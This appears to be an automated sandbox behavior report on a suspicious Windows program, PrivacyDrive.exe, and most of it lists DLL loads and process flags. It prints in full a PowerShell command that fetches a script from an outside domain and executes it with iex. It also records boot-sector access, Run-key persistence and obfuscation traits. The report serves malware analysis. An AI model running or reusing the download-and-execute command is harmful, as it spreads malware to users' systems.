Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,

4_2_0050E640

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h	4_2_0041E4B6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h	4_2_0041E4F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CB540 push ecx; mov dword ptr [esp], 3F800000h	4_2_004CB572
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E570 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041E6F3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00448697 pushfd ; iretd	4_2_004486A2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E7B0 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041E99C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00426880 push ecx; mov dword ptr [esp], 3F800000h	4_2_004268B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CB9E0 push ecx; mov dword ptr [esp], 3F800000h	4_2_004CBA12
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041EA60 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041EC2B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00419A00 push ecx; mov dword ptr [esp], 3F800000h	4_2_00419A34
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004ECB30 push ecx; mov dword ptr [esp], 00000000h	4_2_004ECB42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h	4_2_00486C06
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h	4_2_00486C2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00502C4E push ecx; ret	4_2_00502C61
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00506C25 push ecx; ret	4_2_00506C38
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041BFA0 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041BFEB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FC2307 push ecx; retf	4_2_00FC2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051E0905 push ecx; retf	4_2_051E0906
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FB2307 push ecx; retf	8_2_00FB2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01210905 push ecx; retf	8_2_01210906

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045CD20

Powershell uses Background Intelligent Transfer Service (BITS)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: \KnownDlls32\BitsProxy.dll

Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045CD20

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0041CDA0 QueryServiceStatus,CloseServiceHandle,Sleep,QueryServiceStatus,StartServiceW,GetLastError,Sleep,

4_2_0041CDA0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CDA40 SendMessageW,GetWindowRect,IsIconic,GetWindowRect,PostMessageW,IsZoomed,	4_2_004CDA40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,	4_2_00489C60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,	4_2_00489C60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,	4_2_00489D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,	4_2_00489D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00417E90 IsWindow,GetWindowRect,IsWindow,IsWindowVisible,IsIconic,GetWindowRect,SetWindowPos,	4_2_00417E90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
